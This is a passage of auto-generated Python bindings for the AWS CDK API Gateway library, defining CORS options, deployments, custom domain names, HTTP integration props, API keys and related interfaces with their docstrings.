:param max_age: The Access-Control-Max-Age response header indicates how long the results of a preflight request (that is, the information contained in the Access-Control-Allow-Methods and Access-Control-Allow-Headers headers) can be cached. To disable caching altogether, use ``disableCache: true``. Default: - browser-specific (see reference)
:param status_code: Specifies the response status code returned from the OPTIONS method. Default: 204
"""
self._values = {
'allow_origins': allow_origins,
}
if allow_credentials is not None: self._values["allow_credentials"] = allow_credentials
if allow_headers is not None: self._values["allow_headers"] = allow_headers
if allow_methods is not None: self._values["allow_methods"] = allow_methods
if disable_cache is not None: self._values["disable_cache"] = disable_cache
if expose_headers is not None: self._values["expose_headers"] = expose_headers
if max_age is not None: self._values["max_age"] = max_age
if status_code is not None: self._values["status_code"] = status_code
@property
def allow_origins(self) -> typing.List[str]:
"""Specifies the list of origins that are allowed to make requests to this resource.
If you wish to allow all origins, specify ``Cors.ALL_ORIGINS`` or
``[ * ]``.
Responses will include the ``Access-Control-Allow-Origin`` response header.
If ``Cors.ALL_ORIGINS`` is specified, the ``Vary: Origin`` response header will
also be included.
see
:see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin
"""
return self._values.get('allow_origins')
@property
def allow_credentials(self) -> typing.Optional[bool]:
"""The Access-Control-Allow-Credentials response header tells browsers whether to expose the response to frontend JavaScript code when the request's credentials mode (Request.credentials) is "include".
When a request's credentials mode (Request.credentials) is "include",
browsers will only expose the response to frontend JavaScript code if the
Access-Control-Allow-Credentials value is true.
Credentials are cookies, authorization headers or TLS client certificates.
default
:default: false
see
:see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Credentials
"""
return self._values.get('allow_credentials')
@property
def allow_headers(self) -> typing.Optional[typing.List[str]]:
"""The Access-Control-Allow-Headers response header is used in response to a preflight request which includes the Access-Control-Request-Headers to indicate which HTTP headers can be used during the actual request.
default
:default: Cors.DEFAULT_HEADERS
see
:see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Headers
"""
return self._values.get('allow_headers')
@property
def allow_methods(self) -> typing.Optional[typing.List[str]]:
"""The Access-Control-Allow-Methods response header specifies the method or methods allowed when accessing the resource in response to a preflight request.
If ``ANY`` is specified, it will be expanded to ``Cors.ALL_METHODS``.
default
:default: Cors.ALL_METHODS
see
:see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Methods
"""
return self._values.get('allow_methods')
@property
def disable_cache(self) -> typing.Optional[bool]:
"""Sets Access-Control-Max-Age to -1, which means that caching is disabled. This option cannot be used with ``maxAge``.
default
:default: - cache is enabled
"""
return self._values.get('disable_cache')
@property
def expose_headers(self) -> typing.Optional[typing.List[str]]:
"""The Access-Control-Expose-Headers response header indicates which headers can be exposed as part of the response by listing their names.
If you want clients to be able to access other headers, you have to list
them using the Access-Control-Expose-Headers header.
default
:default:
- only the 6 CORS-safelisted response headers are exposed:
Cache-Control, Content-Language, Content-Type, Expires, Last-Modified,
Pragma
see
:see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Expose-Headers
"""
return self._values.get('expose_headers')
@property
def max_age(self) -> typing.Optional[aws_cdk.core.Duration]:
"""The Access-Control-Max-Age response header indicates how long the results of a preflight request (that is the information contained in the Access-Control-Allow-Methods and Access-Control-Allow-Headers headers) can be cached.
To disable caching altogther use ``disableCache: true``.
default
:default: - browser-specific (see reference)
see
:see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Max-Age
"""
return self._values.get('max_age')
@property
def status_code(self) -> typing.Optional[jsii.Number]:
"""Specifies the response status code returned from the OPTIONS method.
default
:default: 204
"""
return self._values.get('status_code')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CorsOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
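# Illustrative sketch: assembling ``CorsOptions`` for a preflight response that
# allows a single (hypothetical) origin, caches the preflight result for an
# hour, and answers OPTIONS with 204.
def _example_cors_options() -> "CorsOptions":
    return CorsOptions(
        allow_origins=["https://example.com"],     # or Cors.ALL_ORIGINS
        allow_methods=["GET", "POST", "OPTIONS"],  # a subset of Cors.ALL_METHODS
        max_age=aws_cdk.core.Duration.hours(1),    # mutually exclusive with disable_cache=True
        status_code=204,
    )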
class Deployment(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.Deployment"):
"""A Deployment of a REST API.
An immutable representation of a RestApi resource that can be called by users
using Stages. A deployment must be associated with a Stage for it to be
callable over the Internet.
Normally, you don't need to define deployments manually. The RestApi
construct manages a Deployment resource that represents the latest model. It
can be accessed through ``restApi.latestDeployment`` (unless ``deploy: false`` is
set when defining the ``RestApi``).
If you manually define this resource, you will need to know that since
deployments are immutable, as long as the resource's logical ID doesn't
change, the deployment will represent the snapshot in time in which the
resource was created. This means that if you modify the RestApi model (i.e.
add methods or resources), these changes will not be reflected unless a new
deployment resource is created.
To achieve this behavior, the method ``addToLogicalId(data)`` can be used to
augment the logical ID generated for the deployment resource such that it
will include arbitrary data. This is done automatically for the
``restApi.latestDeployment`` deployment.
Furthermore, since a deployment does not reference any of the REST API
resources and methods, CloudFormation will likely provision it before these
resources are created, which means that it will represent a "half-baked"
model. Use the ``node.addDependency(dep)`` method to circumvent that. This is done
automatically for the ``restApi.latestDeployment`` deployment.
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api: "IRestApi", description: typing.Optional[str]=None, retain_deployments: typing.Optional[bool]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param api: The Rest API to deploy.
:param description: A description of the purpose of the API Gateway deployment. Default: - No description.
:param retain_deployments: When an API Gateway model is updated, a new deployment will automatically be created. If this is true, the old API Gateway Deployment resource will not be deleted; this allows manually reverting back to a previous deployment if needed. Default: false
"""
props = DeploymentProps(api=api, description=description, retain_deployments=retain_deployments)
jsii.create(Deployment, self, [scope, id, props])
@jsii.member(jsii_name="addToLogicalId")
def add_to_logical_id(self, data: typing.Any) -> None:
"""Adds a component to the hash that determines this Deployment resource's logical ID.
This should be called by constructs of the API Gateway model that want to
invalidate the deployment when their settings change. The component will
be resolve()ed during synthesis so tokens are welcome.
:param data: -
"""
return jsii.invoke(self, "addToLogicalId", [data])
@property
@jsii.member(jsii_name="api")
def api(self) -> "IRestApi":
return jsii.get(self, "api")
@property
@jsii.member(jsii_name="deploymentId")
def deployment_id(self) -> str:
"""
attribute:
:attribute:: true
"""
return jsii.get(self, "deploymentId")
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.DeploymentProps", jsii_struct_bases=[], name_mapping={'api': 'api', 'description': 'description', 'retain_deployments': 'retainDeployments'})
class DeploymentProps():
def __init__(self, *, api: "IRestApi", description: typing.Optional[str]=None, retain_deployments: typing.Optional[bool]=None):
"""
:param api: The Rest API to deploy.
:param description: A description of the purpose of the API Gateway deployment. Default: - No description.
:param retain_deployments: When an API Gateway model is updated, a new deployment will automatically be created. If this is true, the old API Gateway Deployment resource will not be deleted; this allows manually reverting back to a previous deployment if needed. Default: false
"""
self._values = {
'api': api,
}
if description is not None: self._values["description"] = description
if retain_deployments is not None: self._values["retain_deployments"] = retain_deployments
@property
def api(self) -> "IRestApi":
"""The Rest API to deploy."""
return self._values.get('api')
@property
def description(self) -> typing.Optional[str]:
"""A description of the purpose of the API Gateway deployment.
default
:default: - No description.
"""
return self._values.get('description')
@property
def retain_deployments(self) -> typing.Optional[bool]:
"""When an API Gateway model is updated, a new deployment will automatically be created. If this is true (default), the old API Gateway Deployment resource will not be deleted. This will allow manually reverting back to a previous deployment in case for example.
default
:default: false
"""
return self._values.get('retain_deployments')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'DeploymentProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.DomainNameAttributes", jsii_struct_bases=[], name_mapping={'domain_name': 'domainName', 'domain_name_alias_hosted_zone_id': 'domainNameAliasHostedZoneId', 'domain_name_alias_target': 'domainNameAliasTarget'})
class DomainNameAttributes():
def __init__(self, *, domain_name: str, domain_name_alias_hosted_zone_id: str, domain_name_alias_target: str):
"""
:param domain_name: The domain name (e.g. ``example.com``).
:param domain_name_alias_hosted_zone_id: The Route53 hosted zone ID to use in order to connect a record set to this domain through an alias.
:param domain_name_alias_target: The Route53 alias target to use in order to connect a record set to this domain through an alias.
"""
self._values = {
'domain_name': domain_name,
'domain_name_alias_hosted_zone_id': domain_name_alias_hosted_zone_id,
'domain_name_alias_target': domain_name_alias_target,
}
@property
def domain_name(self) -> str:
"""The domain name (e.g. ``example.com``)."""
return self._values.get('domain_name')
@property
def domain_name_alias_hosted_zone_id(self) -> str:
"""Thje Route53 hosted zone ID to use in order to connect a record set to this domain through an alias."""
return self._values.get('domain_name_alias_hosted_zone_id')
@property
def domain_name_alias_target(self) -> str:
"""The Route53 alias target to use in order to connect a record set to this domain through an alias."""
return self._values.get('domain_name_alias_target')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'DomainNameAttributes(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.DomainNameOptions", jsii_struct_bases=[], name_mapping={'certificate': 'certificate', 'domain_name': 'domainName', 'endpoint_type': 'endpointType'})
class DomainNameOptions():
def __init__(self, *, certificate: aws_cdk.aws_certificatemanager.ICertificate, domain_name: str, endpoint_type: typing.Optional["EndpointType"]=None):
"""
:param certificate: The reference to an AWS-managed certificate for use by the edge-optimized endpoint for the domain name. For "EDGE" domain names, the certificate needs to be in the US East (N. Virginia) region.
:param domain_name: The custom domain name for your API. Uppercase letters are not supported.
:param endpoint_type: The type of endpoint for this DomainName. Default: REGIONAL
"""
self._values = {
'certificate': certificate,
'domain_name': domain_name,
}
if endpoint_type is not None: self._values["endpoint_type"] = endpoint_type
@property
def certificate(self) -> aws_cdk.aws_certificatemanager.ICertificate:
"""The reference to an AWS-managed certificate for use by the edge-optimized endpoint for the domain name.
For "EDGE" domain names, the certificate
needs to be in the US East (N. Virginia) region.
"""
return self._values.get('certificate')
@property
def domain_name(self) -> str:
"""The custom domain name for your API.
Uppercase letters are not supported.
"""
return self._values.get('domain_name')
@property
def endpoint_type(self) -> typing.Optional["EndpointType"]:
"""The type of endpoint for this DomainName.
default
:default: REGIONAL
"""
return self._values.get('endpoint_type')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'DomainNameOptions(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.DomainNameProps", jsii_struct_bases=[DomainNameOptions], name_mapping={'certificate': 'certificate', 'domain_name': 'domainName', 'endpoint_type': 'endpointType', 'mapping': 'mapping'})
class DomainNameProps(DomainNameOptions):
def __init__(self, *, certificate: aws_cdk.aws_certificatemanager.ICertificate, domain_name: str, endpoint_type: typing.Optional["EndpointType"]=None, mapping: typing.Optional["IRestApi"]=None):
"""
:param certificate: The reference to an AWS-managed certificate for use by the edge-optimized endpoint for the domain name. For "EDGE" domain names, the certificate needs to be in the US East (N. Virginia) region.
:param domain_name: The custom domain name for your API. Uppercase letters are not supported.
:param endpoint_type: The type of endpoint for this DomainName. Default: REGIONAL
:param mapping: If specified, all requests to this domain will be mapped to the production deployment of this API. If you wish to map this domain to multiple APIs with different base paths, don't specify this option and use ``addBasePathMapping``. Default: - you will have to call ``addBasePathMapping`` to map this domain to API endpoints.
"""
self._values = {
'certificate': certificate,
'domain_name': domain_name,
}
if endpoint_type is not None: self._values["endpoint_type"] = endpoint_type
if mapping is not None: self._values["mapping"] = mapping
@property
def certificate(self) -> aws_cdk.aws_certificatemanager.ICertificate:
"""The reference to an AWS-managed certificate for use by the edge-optimized endpoint for the domain name.
For "EDGE" domain names, the certificate
needs to be in the US East (N. Virginia) region.
"""
return self._values.get('certificate')
@property
def domain_name(self) -> str:
"""The custom domain name for your API.
Uppercase letters are not supported.
"""
return self._values.get('domain_name')
@property
def endpoint_type(self) -> typing.Optional["EndpointType"]:
"""The type of endpoint for this DomainName.
default
:default: REGIONAL
"""
return self._values.get('endpoint_type')
@property
def mapping(self) -> typing.Optional["IRestApi"]:
"""If specified, all requests to this domain will be mapped to the production deployment of this API.
If you wish to map this domain to multiple APIs
with different base paths, don't specify this option and use
``addBasePathMapping``.
default
:default:
- you will have to call ``addBasePathMapping`` to map this domain to
API endpoints.
"""
return self._values.get('mapping')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'DomainNameProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.enum(jsii_type="@aws-cdk/aws-apigateway.EndpointType")
class EndpointType(enum.Enum):
EDGE = "EDGE"
"""For an edge-optimized API and its custom domain name."""
REGIONAL = "REGIONAL"
"""For a regional API and its custom domain name."""
PRIVATE = "PRIVATE"
"""For a private API and its custom domain name."""
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.HttpIntegrationProps", jsii_struct_bases=[], name_mapping={'http_method': 'httpMethod', 'options': 'options', 'proxy': 'proxy'})
class HttpIntegrationProps():
def __init__(self, *, http_method: typing.Optional[str]=None, options: typing.Optional["IntegrationOptions"]=None, proxy: typing.Optional[bool]=None):
"""
:param http_method: HTTP method to use when invoking the backend URL. Default: GET
:param options: Integration options, such as request/response mapping, content handling, etc. Default: defaults based on ``IntegrationOptions`` defaults
:param proxy: Determines whether to use proxy integration or custom integration. Default: true
"""
if isinstance(options, dict): options = IntegrationOptions(**options)
self._values = {
}
if http_method is not None: self._values["http_method"] = http_method
if options is not None: self._values["options"] = options
if proxy is not None: self._values["proxy"] = proxy
@property
def http_method(self) -> typing.Optional[str]:
"""HTTP method to use when invoking the backend URL.
default
:default: GET
"""
return self._values.get('http_method')
@property
def options(self) -> typing.Optional["IntegrationOptions"]:
"""Integration options, such as request/resopnse mapping, content handling, etc.
default
:default: defaults based on ``IntegrationOptions`` defaults
"""
return self._values.get('options')
@property
def proxy(self) -> typing.Optional[bool]:
"""Determines whether to use proxy integration or custom integration.
default
:default: true
"""
return self._values.get('proxy')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'HttpIntegrationProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
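# Illustrative sketch: props for a non-proxy HTTP integration that POSTs to the
# backend; ``IntegrationOptions`` defaults apply because ``options`` is omitted.
def _example_http_integration_props() -> "HttpIntegrationProps":
    return HttpIntegrationProps(http_method="POST", proxy=False)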
@jsii.interface(jsii_type="@aws-cdk/aws-apigateway.IApiKey")
class IApiKey(aws_cdk.core.IResource, jsii.compat.Protocol):
"""API keys are alphanumeric string values that you distribute to app developer customers to grant access to your API."""
@staticmethod
def __jsii_proxy_class__():
return _IApiKeyProxy
@property
@jsii.member(jsii_name="keyId")
def key_id(self) -> str:
"""The API key ID.
attribute:
:attribute:: true
"""
...
class _IApiKeyProxy(jsii.proxy_for(aws_cdk.core.IResource)):
"""API keys are alphanumeric string values that you distribute to app developer customers to grant access to your API."""
__jsii_type__ = "@aws-cdk/aws-apigateway.IApiKey"
@property
@jsii.member(jsii_name="keyId")
def key_id(self) -> str:
"""The API key ID.
attribute:
:attribute:: true
"""
return jsii.get(self, "keyId")
@jsii.implements(IApiKey)
class ApiKey(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.ApiKey"):
"""An API Gateway ApiKey.
An ApiKey can be distributed to API clients that are executing requests
for Method resources that require an Api Key.
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_key_name: typing.Optional[str]=None, customer_id: typing.Optional[str]=None, description: typing.Optional[str]=None, enabled: typing.Optional[bool]=None, generate_distinct_id: typing.Optional[bool]=None, resources: typing.Optional[typing.List["RestApi"]]=None, default_cors_preflight_options: typing.Optional["CorsOptions"]=None, default_integration: typing.Optional["Integration"]=None, default_method_options: typing.Optional["MethodOptions"]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param api_key_name: A name for the API key. If you don't specify a name, AWS CloudFormation generates a unique physical ID and uses that ID for the API key name. Default: automatically generated name
:param customer_id: An AWS Marketplace customer identifier to use when integrating with the AWS SaaS Marketplace. Default: none
:param description: A description of the purpose of the API key. Default: none
:param enabled: Indicates whether the API key can be used by clients. Default: true
:param generate_distinct_id: Specifies whether the key identifier is distinct from the created API key value. Default: false
:param resources: A list of resources this api key is associated with. Default: none
:param default_cors_preflight_options: Adds a CORS preflight OPTIONS method to this resource and all child resources. You can add CORS at the resource-level using ``addCorsPreflight``. Default: - CORS is disabled
:param default_integration: An integration to use as a default for all methods created within this API unless an integration is specified. Default: - Inherited from parent.
:param default_method_options: Method options to use as a default for all methods created within this API unless custom options are specified. Default: - Inherited from parent.
"""
props = ApiKeyProps(api_key_name=api_key_name, customer_id=customer_id, description=description, enabled=enabled, generate_distinct_id=generate_distinct_id, resources=resources, default_cors_preflight_options=default_cors_preflight_options, default_integration=default_integration, default_method_options=default_method_options)
jsii.create(ApiKey, self, [scope, id, props])
@property
@jsii.member(jsii_name="keyId")
def key_id(self) -> str:
"""The API key ID."""
return jsii.get(self, "keyId")
@jsii.interface(jsii_type="@aws-cdk/aws-apigateway.IAuthorizer")
class IAuthorizer(jsii.compat.Protocol):
"""Represents an API Gateway authorizer."""
@staticmethod
def __jsii_proxy_class__():
return _IAuthorizerProxy
@property
@jsii.member(jsii_name="authorizerId")
def authorizer_id(self) -> str:
"""The authorizer ID."""
...
class _IAuthorizerProxy():
"""Represents an API Gateway authorizer."""
__jsii_type__ = "@aws-cdk/aws-apigateway.IAuthorizer"
@property
@jsii.member(jsii_name="authorizerId")
def authorizer_id(self) -> str:
"""The authorizer ID."""
return jsii.get(self, "authorizerId")
@jsii.interface(jsii_type="@aws-cdk/aws-apigateway.IDomainName")
class IDomainName(aws_cdk.core.IResource, jsii.compat.Protocol):
@staticmethod
def __jsii_proxy_class__():
return _IDomainNameProxy
@property
@jsii.member(jsii_name="domainName")
def domain_name(self) -> str:
"""The domain name (e.g. ``example.com``).
attribute:
:attribute:: DomainName
"""
...
@property
@jsii.member(jsii_name="domainNameAliasDomainName")
def domain_name_alias_domain_name(self) -> str:
"""The Route53 alias target to use in order to connect a record set to this domain through an alias.
attribute:
:attribute:: DistributionDomainName,RegionalDomainName
"""
...
@property
@jsii.member(jsii_name="domainNameAliasHostedZoneId")
def domain_name_alias_hosted_zone_id(self) -> str:
"""The Route53 hosted zone ID to use in order to connect a record set to this domain through an alias.
attribute:
:attribute:: DistributionHostedZoneId,RegionalHostedZoneId
"""
...
class _IDomainNameProxy(jsii.proxy_for(aws_cdk.core.IResource)):
__jsii_type__ = "@aws-cdk/aws-apigateway.IDomainName"
@property
@jsii.member(jsii_name="domainName")
def domain_name(self) -> str:
"""The domain name (e.g. ``example.com``).
attribute:
:attribute:: DomainName
"""
return jsii.get(self, "domainName")
@property
@jsii.member(jsii_name="domainNameAliasDomainName")
def domain_name_alias_domain_name(self) -> str:
"""The Route53 alias target to use in order to connect a record set to this domain through an alias.
attribute:
:attribute:: DistributionDomainName,RegionalDomainName
"""
return jsii.get(self, "domainNameAliasDomainName")
@property
@jsii.member(jsii_name="domainNameAliasHostedZoneId")
def domain_name_alias_hosted_zone_id(self) -> str:
"""The Route53 hosted zone ID to use in order to connect a record set to this domain through an alias.
attribute:
:attribute:: DistributionHostedZoneId,RegionalHostedZoneId
"""
return jsii.get(self, "domainNameAliasHostedZoneId")
@jsii.implements(IDomainName)
class DomainName(aws_cdk.core.Resource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.DomainName"):
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, mapping: typing.Optional["IRestApi"]=None, certificate: aws_cdk.aws_certificatemanager.ICertificate, domain_name: str, endpoint_type: typing.Optional["EndpointType"]=None) -> None:
"""
:param scope: -
:param id: -
:param props: -
:param mapping: If specified, all requests to this domain will be mapped to the production deployment of this API. If you wish to map this domain to multiple APIs with different base paths, don't specify this option and use ``addBasePathMapping``. Default: - you will have to call ``addBasePathMapping`` to map this domain to API endpoints.
:param certificate: The reference to an AWS-managed certificate for use by the edge-optimized endpoint for the domain name. For "EDGE" domain names, the certificate needs to be in the US East (N. Virginia) region.
:param domain_name: The custom domain name for your API. Uppercase letters are not supported.
:param endpoint_type: The type of endpoint for this DomainName. Default: REGIONAL
"""
props = DomainNameProps(mapping=mapping, certificate=certificate, domain_name=domain_name, endpoint_type=endpoint_type)
jsii.create(DomainName, self, [scope, id, props])
@jsii.member(jsii_name="fromDomainNameAttributes")
@classmethod
def from_domain_name_attributes(cls, scope: aws_cdk.core.Construct, id: str, *, domain_name: str, domain_name_alias_hosted_zone_id: str, domain_name_alias_target: str) -> "IDomainName":
"""Imports an existing domain name.
:param scope: -
:param id: -
:param attrs: -
:param domain_name: The domain name (e.g. ``example.com``).
:param domain_name_alias_hosted_zone_id: The Route53 hosted zone ID to use in order to connect a record set to this domain through an alias.
:param domain_name_alias_target: The Route53 alias target to use in order to connect a record set to this domain through an alias.
"""
attrs = DomainNameAttributes(domain_name=domain_name, domain_name_alias_hosted_zone_id=domain_name_alias_hosted_zone_id, domain_name_alias_target=domain_name_alias_target)
return jsii.sinvoke(cls, "fromDomainNameAttributes", [scope, id, attrs])
@jsii.member(jsii_name="addBasePathMapping")
def add_base_path_mapping(self, target_api: "IRestApi", *, base_path: typing.Optional[str]=None) -> "BasePathMapping":
"""Maps this domain to an API endpoint.
:param target_api: The target API endpoint; requests will be mapped to its deployment stage.
:param options: Options for mapping to base path with or without a stage.
:param base_path: The base path name that callers of the API must provide in the URL after the domain name (e.g. ``example.com/base-path``). If you specify this property, it can't be an empty string. Default: - map requests from the domain root (e.g. ``example.com``). If this is undefined, no additional mappings will be allowed on this domain name.
"""
options = BasePathMappingOptions(base_path=base_path)
return jsii.invoke(self, "addBasePathMapping", [target_api, options])
@property
@jsii.member(jsii_name="domainName")
def domain_name(self) -> str:
"""The domain name (e.g. ``example.com``)."""
return jsii.get(self, "domainName")
@property
@jsii.member(jsii_name="domainNameAliasDomainName")
def domain_name_alias_domain_name(self) -> str:
"""The Route53 alias target to use in order to connect a record set to this domain through an alias."""
return jsii.get(self, "domainNameAliasDomainName")
@property
@jsii.member(jsii_name="domainNameAliasHostedZoneId")
def domain_name_alias_hosted_zone_id(self) -> str:
"""The Route53 hosted zone ID to use in order to connect a record set to this domain through an alias."""
return jsii.get(self, "domainNameAliasHostedZoneId")
@jsii.interface(jsii_type="@aws-cdk/aws-apigateway.IModel")
class IModel(jsii.compat.Protocol):
@staticmethod
def __jsii_proxy_class__():
return _IModelProxy
@property
@jsii.member(jsii_name="modelId")
def model_id(self) -> str:
"""Returns the model name, such as 'myModel'.
attribute:
:attribute:: true
"""
...
class _IModelProxy():
__jsii_type__ = "@aws-cdk/aws-apigateway.IModel"
@property
@jsii.member(jsii_name="modelId")
def model_id(self) -> str:
"""Returns the model name, such as 'myModel'.
attribute:
:attribute:: true
"""
return jsii.get(self, "modelId")
@jsii.implements(IModel)
class EmptyModel(metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.EmptyModel"):
"""Represents a reference to a REST API's Empty model, which is available as part of the model collection by default.
This can be used for mapping
JSON responses from an integration to what is returned to a client,
where strong typing is not required. In the absence of any defined
model, the Empty model will be used to return the response payload
unmapped.
Definition
{
"$schema" : "http://json-schema.org/draft-04/schema#",
"title" : "Empty Schema",
"type" : "object"
}
deprecated
:deprecated: You should use ``Model.EMPTY_MODEL``.
see
:see: Model.EMPTY_MODEL
stability
:stability: deprecated
"""
def __init__(self) -> None:
jsii.create(EmptyModel, self, [])
@property
@jsii.member(jsii_name="modelId")
def model_id(self) -> str:
"""Returns the model name, such as 'myModel'.
stability
:stability: deprecated
"""
return jsii.get(self, "modelId")
@jsii.implements(IModel)
class ErrorModel(metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.ErrorModel"):
"""Represents a reference to a REST API's Error model, which is available as part of the model collection by default.
This can be used for mapping
error JSON responses from an integration to a client, where a simple
generic message field is sufficient to map and return an error payload.
Definition
{
"$schema" : "http://json-schema.org/draft-04/schema#",
"title" : "Error Schema",
"type" : "object",
"properties" : {
"message" : { "type" : "string" }
}
}
deprecated
:deprecated: You should use ``Model.ERROR_MODEL``.
see
:see: Model.ERROR_MODEL
stability
:stability: deprecated
"""
def __init__(self) -> None:
jsii.create(ErrorModel, self, [])
@property
@jsii.member(jsii_name="modelId")
def model_id(self) -> str:
"""Returns the model name, such as 'myModel'.
stability
:stability: deprecated
"""
return jsii.get(self, "modelId")
@jsii.interface(jsii_type="@aws-cdk/aws-apigateway.IRequestValidator")
class IRequestValidator(aws_cdk.core.IResource, jsii.compat.Protocol):
@staticmethod
def __jsii_proxy_class__():
return _IRequestValidatorProxy
@property
@jsii.member(jsii_name="requestValidatorId")
def request_validator_id(self) -> str:
"""ID of the request validator, such as abc123.
attribute:
:attribute:: true
"""
...
class _IRequestValidatorProxy(jsii.proxy_for(aws_cdk.core.IResource)):
__jsii_type__ = "@aws-cdk/aws-apigateway.IRequestValidator"
@property
@jsii.member(jsii_name="requestValidatorId")
def request_validator_id(self) -> str:
"""ID of the request validator, such as abc123.
attribute:
:attribute:: true
"""
return jsii.get(self, "requestValidatorId")
@jsii.interface(jsii_type="@aws-cdk/aws-apigateway.IResource")
class IResource(aws_cdk.core.IResource, jsii.compat.Protocol):
@staticmethod
def __jsii_proxy_class__():
return _IResourceProxy
@property
@jsii.member(jsii_name="path")
def path(self) -> str:
"""The full path of this resuorce."""
...
@property
@jsii.member(jsii_name="resourceId")
def resource_id(self) -> str:
"""The ID of the resource.
attribute:
:attribute:: true
"""
...
@property
@jsii.member(jsii_name="restApi")
def rest_api(self) -> "RestApi":
"""The rest API that this resource is part of.
The reason we need the RestApi object itself and not just the ID is that the model
is being tracked by the top-level RestApi object for the purpose of calculating its
hash to determine the ID of the deployment. This allows us to automatically update
the deployment when the model of the REST API changes.
"""
...
@property
@jsii.member(jsii_name="defaultCorsPreflightOptions")
def default_cors_preflight_options(self) -> typing.Optional["CorsOptions"]:
"""Default options for CORS preflight OPTIONS method."""
...
@property
@jsii.member(jsii_name="defaultIntegration")
def default_integration(self) -> typing.Optional["Integration"]:
"""An integration to use as a default for all methods created within this API unless an integration is specified."""
...
@property
@jsii.member(jsii_name="defaultMethodOptions")
def default_method_options(self) -> typing.Optional["MethodOptions"]:
"""Method options to use as a default for all methods created within this API unless custom options are specified."""
...
@property
@jsii.member(jsii_name="parentResource")
def parent_resource(self) -> typing.Optional["IResource"]:
"""The parent of this resource or undefined for the root resource."""
...
@jsii.member(jsii_name="addCorsPreflight")
def add_cors_preflight(self, *, allow_origins: typing.List[str], allow_credentials: typing.Optional[bool]=None, allow_headers: typing.Optional[typing.List[str]]=None, allow_methods: typing.Optional[typing.List[str]]=None, disable_cache: typing.Optional[bool]=None, expose_headers: typing.Optional[typing.List[str]]=None, max_age: typing.Optional[aws_cdk.core.Duration]=None, status_code: typing.Optional[jsii.Number]=None) -> "Method":
"""Adds an OPTIONS method to this resource which responds to Cross-Origin Resource Sharing (CORS) preflight requests.
Cross-Origin Resource Sharing (CORS) is a mechanism that uses additional
HTTP headers to tell browsers to give a web application running at one
origin, access to selected resources from a different origin. A web
application executes a cross-origin HTTP request when it requests a
resource that has a different origin (domain, protocol, or port) from its
own.
:param options: CORS options.
:param allow_origins: Specifies the list of origins that are allowed to make requests to this resource. If you wish to allow all origins, specify ``Cors.ALL_ORIGINS`` or ``[ * ]``. Responses will include the ``Access-Control-Allow-Origin`` response header. If ``Cors.ALL_ORIGINS`` is specified, the ``Vary: Origin`` response header will also be included.
:param allow_credentials: The Access-Control-Allow-Credentials response header tells browsers whether to expose the response to frontend JavaScript code when the request's credentials mode (Request.credentials) is "include". When a request's credentials mode (Request.credentials) is "include", browsers will only expose the response to frontend JavaScript code if the Access-Control-Allow-Credentials value is true. Credentials are cookies, authorization headers or TLS client certificates. Default: false
:param allow_headers: The Access-Control-Allow-Headers response header is used in response to a preflight request which includes the Access-Control-Request-Headers to indicate which HTTP headers can be used during the actual request. Default: Cors.DEFAULT_HEADERS
:param allow_methods: The Access-Control-Allow-Methods response header specifies the method or methods allowed when accessing the resource in response to a preflight request. If ``ANY`` is specified, it will be expanded to ``Cors.ALL_METHODS``. Default: Cors.ALL_METHODS
:param disable_cache: Sets Access-Control-Max-Age to -1, which means that caching is disabled. This option cannot be used with ``maxAge``. Default: - cache is enabled
:param expose_headers: The Access-Control-Expose-Headers response header indicates which headers can be exposed as part of the response by listing their names. If you want clients to be able to access other headers, you have to list them using the Access-Control-Expose-Headers header. Default: - only the 6 CORS-safelisted response headers are exposed: Cache-Control, Content-Language, Content-Type, Expires, Last-Modified, Pragma
